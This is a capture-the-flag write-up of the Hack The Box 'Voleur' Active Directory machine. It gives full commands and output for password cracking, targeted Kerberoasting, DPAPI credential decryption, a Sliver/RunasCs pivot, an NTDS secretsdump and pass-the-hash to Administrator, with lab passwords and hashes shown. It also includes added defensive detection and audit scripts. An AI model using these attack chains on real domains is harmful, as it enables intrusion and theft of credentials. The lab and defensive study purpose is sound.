
# Voleur

## User

Set up `/etc/krb5.conf` for Kerberos authentication against the `VOLEUR.HTB` realm:

```ini
[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true

[realms]
    VOLEUR.HTB = {
        kdc = 10.10.11.76
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB
```

Add the DC to `/etc/hosts`:

```bash
10.10.11.76 DC.voleur.htb voleur.htb
```

We can now request a TGT with `kinit` and authenticate with Kerberos, pointing `KRB5CCNAME` at the resulting credential cache:

```bash
kinit ryan.naylor
ryan.naylor@VOLEUR.HTB's Password:

klist
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: ryan.naylor@VOLEUR.HTB

  Issued                Expires               Principal
Jul  7 06:27:07 2025  Jul  7 16:27:07 2025  krbtgt/VOLEUR.HTB@VOLEUR.HTB

export KRB5CCNAME=/tmp/krb5cc_1000

klist
Credentials cache: FILE:/tmp/krb5cc_1000
        Principal: ryan.naylor@VOLEUR.HTB

  Issued                Expires               Principal
Jul  7 06:27:07 2025  Jul  7 16:27:07 2025  krbtgt/VOLEUR.HTB@VOLEUR.HTB
```

Enumerating the shares gives us a password-protected Excel file, `Access_Review.xlsx`. Its hash can be extracted with `office2john` and cracked with `john`:

```bash
office2john Access_Review.xlsx > hash.txt

john --wordlist=/home/kali/Desktop/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x / SHA512 256/256 AVX2 4x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football1        (Access_Review.xlsx)
1g 0:00:00:01 DONE (2025-07-07 03:31) 0.7352g/s 611.7p/s 611.7c/s 611.7C/s football1..legolas
Use the "--show" optio
```

The Excel file gives us the following credentials: `svc_ldap`:`M1XyC9pW7qT5Vn`, `svc_iis`:`N5pXyW1VqM7CZ8` and `todd.wolfe`:`NightT1meP1dg3on14`.

`svc_ldap` has `WriteSPN` over `svc_winrm`. Since there is no ADCS in the domain, we make use of targeted Kerberoasting instead: write an arbitrary SPN onto `svc_winrm`, request a service ticket for it and crack the ticket offline.

```bash
bloodyAD -d voleur.htb --host dc.voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set object "svc_winrm" servicePrincipalName -v 'http/anything'
[+] svc_winrm's servicePrincipalName has been updated

netexec ldap DC.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k --kerberoasting out.txt
LDAP        DC.voleur.htb   389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        DC.voleur.htb   389    DC               [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
LDAP        DC.voleur.htb   389    DC               [*] Skipping disabled account: krbtgt
LDAP        DC.voleur.htb   389    DC               [*] Total of records returned 1
LDAP        DC.voleur.htb   389    DC               [*] sAMAccountName: svc_winrm, memberOf: CN=Remote Management Users,CN=Builtin,DC=voleur,DC=htb, pwdLastSet: 2025-01-31 17:10:12.398769, lastLogon: 2025-07-07 03:14:39.737268
LDAP        DC.voleur.htb   389    DC               $krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$e3a804f76a893f34385ed7418ff6bb1b$<snip>

$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb\svc_winrm*$<snip>:AFireInsidedeOzarctica980219afi
```
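From the defender's side, the chain above leaves two correlatable traces: a `servicePrincipalName` write (Security event 5136) followed shortly by an RC4 service-ticket request for the same account (event 4769 with `TicketEncryptionType` 0x17, which is the etype behind the `$krb5tgs$23$` format). The detection logic below is an added example, not code from the writeup; it assumes Directory Service Changes auditing is on so 5136 is logged, and all records are constructed samples.

```python
"""Correlate SPN writes (5136) with later RC4 TGS requests (4769) for the same account.
Sample records are constructed; field names follow the Security EventData names."""
from datetime import datetime, timedelta

EVENTS = [
    {"EventID": 5136, "Time": "2025-07-07T03:20:01", "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,CN=Users,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "http/anything"},
    {"EventID": 4769, "Time": "2025-07-07T03:20:40", "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.99"},
    # Benign: AES ticket (0x12) for a computer account, with no preceding SPN write.
    {"EventID": 4769, "Time": "2025-07-07T03:25:00", "TargetUserName": "ryan.naylor@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.11.76"},
]


def spn_account(object_dn):
    """Return the account name (first RDN value) of an ObjectDN, lower-cased."""
    rdn = object_dn.split(",", 1)[0]          # e.g. "CN=svc_winrm"
    return rdn.split("=", 1)[1].strip().lower()


def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Return one alert per SPN write that is followed, within `window`,
    by an RC4 (0x17) service-ticket request for the account that received the SPN."""
    spn_writes = []   # (time, writer, account that received the SPN)
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):   # ISO timestamps sort lexically
        t = datetime.fromisoformat(ev["Time"])
        if (ev["EventID"] == 5136
                and ev.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"):
            spn_writes.append((t, ev["SubjectUserName"], spn_account(ev["ObjectDN"])))
        elif ev["EventID"] == 4769 and ev.get("TicketEncryptionType", "").lower() == "0x17":
            service = ev["ServiceName"].lower()
            for wt, writer, target in spn_writes:
                if target == service and timedelta(0) <= t - wt <= window:
                    alerts.append({"writer": writer, "target": target,
                                   "requester": ev["TargetUserName"], "source": ev["IpAddress"],
                                   "seconds_after_write": int((t - wt).total_seconds())})
    return alerts


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(EVENTS):
        print(f"[!] {a['writer']} set an SPN on {a['target']}; RC4 TGS requested by "
              f"{a['requester']} from {a['source']} {a['seconds_after_write']}s later")
```

A 5136 event is only emitted for objects carrying a matching SACL, so the rule is only as good as the audit policy on the account objects it is meant to cover.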

We can get the user flag as `svc_winrm`, again using `kinit` to obtain a TGT and authenticating to WinRM with Kerberos:

```bash
kinit svc_winrm
svc_winrm@VOLEUR.HTB's Password:

evil-winrm -i DC.voleur.htb -u svc_winrm -r voleur.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents>
```

## Root

`svc_ldap` is in the `Restore Users` group, which hints that it can restore the deleted user `Todd.Wolfe`. We get a shell as `svc_ldap` from the Sliver beacon using `RunasCs.exe`:

```bash
execute-assembly /home/kali/Desktop/HTB/Tools/precompiled-binaries/LateralMovement/RunasCs.exe svc_ldap M1XyC9pW7qT5Vn a.exe

[*] Beacon bec3c39d OLD-FASHIONED_SHADOWBOX - 10.10.11.76:64050 (DC) - windows/amd64 - Mon, 07 Jul 2025 05:27:49 +08
```

We list the tombstoned objects, restore Todd Wolfe's account by its `ObjectGUID` and enable it:

{% code overflow="wrap" %}

```powershell
PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects

Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8

Deleted           : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted
                    Objects,DC=voleur,DC=htb
Name              : Todd Wolfe
                    DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass       : user
ObjectGUID        : 1c6b1deb-c372-4cbb-87b1-15031de169db

PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> Enable-ADAccount -Identity "Todd.Wolfe"
```

{% endcode %}

We can check with `netexec` that `Todd.Wolfe` is usable again with the password from the Excel file, `NightT1meP1dg3on14`:

```bash
netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14

netexec smb DC.voleur.htb -u 'Todd.Wolfe' -p NightT1meP1dg3on14 -k --shares
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] voleur.htb\Todd.Wolfe:NightT1meP1dg3on14
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance
SMB         DC.voleur.htb   445    DC               HR
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share
```

Accessing the `IT` share again, we find an archived home directory of `Todd.Wolfe`. Its DPAPI-protected data can be decrypted with `impacket-dpapi` in two steps: first decrypt the master key with the user's password and SID, then decrypt the credential blob with the recovered key. The master key is at `C:\Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88` and the credential blob at `C:\Users\todd.wolfe\AppData\Roaming\Credentials\772275FAD58525253490A9B0039791D3`.

{% code overflow="wrap" %}

```bash
impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password NightT1meP1dg3on14 -sid S-1-5-21-3927696377-1337352550-2781715495-1110
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description : 
Unknown     : 
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m
```

{% endcode %}

Enumerating the shares once again gives access to the `svc_backup` SSH key hinted at in the Excel note. SSH on port 2222 leads into a WSL instance on the DC:

```bash
ssh -i id_rsa -p 2222 svc_backup@DC.voleur.htb                

Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul  6 15:05:32 PDT 2025

  System load:    0.52      Processes:             15
  Usage of /home: unknown   Users logged in:       0
  Memory usage:   60%       IPv4 address for eth0: 10.10.11.76
  Swap usage:     3%


363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Jul  6 14:38:47 2025 from 10.10.11.76
 * Starting OpenBSD Secure Shell server sshd   [ OK ]
svc_backup@DC:~$ ls
svc_backup@DC:~$ whoami
svc_backup
```

The Windows filesystem is mounted under `/mnt/c`. Under the `IT` share's `Third-Line Support/Backups` directory we find copies of the `SECURITY` and `SYSTEM` hives together with `ntds.dit`:

```bash
root@DC:/mnt/c/IT/Third-Line Support/Backups# ls
'Active Directory'   registry
root@DC:/mnt/c/IT/Third-Line Support/Backups# cd registry
root@DC:/mnt/c/IT/Third-Line Support/Backups/registry# ls
SECURITY  SYSTEM
```

With the two hives and `ntds.dit` we can dump the domain credentials offline and use the `Administrator` hash to get access via evil-winrm:

{% code overflow="wrap" %}

```bash
impacket-secretsdump local -system SYSTEM -security SECURITY -ntds ntds.dit
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM 
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e377177574
```

{% endcode %}
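The same dump format is what a blue team reviews after an NTDS exposure like this one. The parser and audit below are an added example, not code from the writeup: it reads `domain\user:rid:lmhash:nthash:::` lines and reports empty passwords, NT hashes shared between accounts (password reuse) and any stored LM hash, and it reports rather than parses a truncated line such as the last one above. The sample dump and its hashes are constructed.

```python
"""Credential-hygiene audit over secretsdump-style NTDS output (constructed sample)."""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample; the last line is deliberately cut off, as happens when a dump
# is copied from a terminal, so that malformed input is surfaced instead of silently lost.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
corp.example\\alice:1103:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
corp.example\\svc_app:1104:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
corp.example\\svc_cut:1105:aad3b435b51404eeaad3b435b51404ee:5d7e377177574
"""


def parse_dump(text):
    """Parse dump lines into dicts; returns (records, malformed_lines)."""
    records, malformed = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            if line.strip():
                malformed.append(line)
            continue
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["account"] = rec["user"].split("\\")[-1]   # drop the "domain\" prefix
        records.append(rec)
    return records, malformed


def audit(records):
    """Return (finding, account_or_accounts) tuples for the hygiene problems found."""
    findings, by_nt = [], defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append(("empty_password", r["account"]))
        if r["lm"] != EMPTY_LM:
            findings.append(("lm_hash_stored", r["account"]))
        by_nt[r["nt"]].append(r["account"])
    for nt, accounts in by_nt.items():
        if nt != EMPTY_NT and len(accounts) > 1:
            findings.append(("shared_password", ",".join(sorted(accounts))))
    return findings


if __name__ == "__main__":
    recs, bad = parse_dump(SAMPLE_DUMP)
    for kind, who in audit(recs):
        print(f"[{kind}] {who}")
    for line in bad:
        print(f"[unparsed] {line}")
```

An empty-password finding on `Guest` is expected when the account is disabled; running secretsdump with `-user-status` appends each account's enabled/disabled state so the two cases can be told apart.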

We only have the NT hash of `Administrator`, not the password, so we request a TGT with `impacket-getTGT` from the hash and use that ticket with evil-winrm:

{% code overflow="wrap" %}

```bash
impacket-getTGT voleur.htb/Administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in Administrator.ccache

export KRB5CCNAME=./Administrator.ccache

evil-winrm -i dc.voleur.htb -u Administrator -r voleur.htb

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```

{% endcode %}

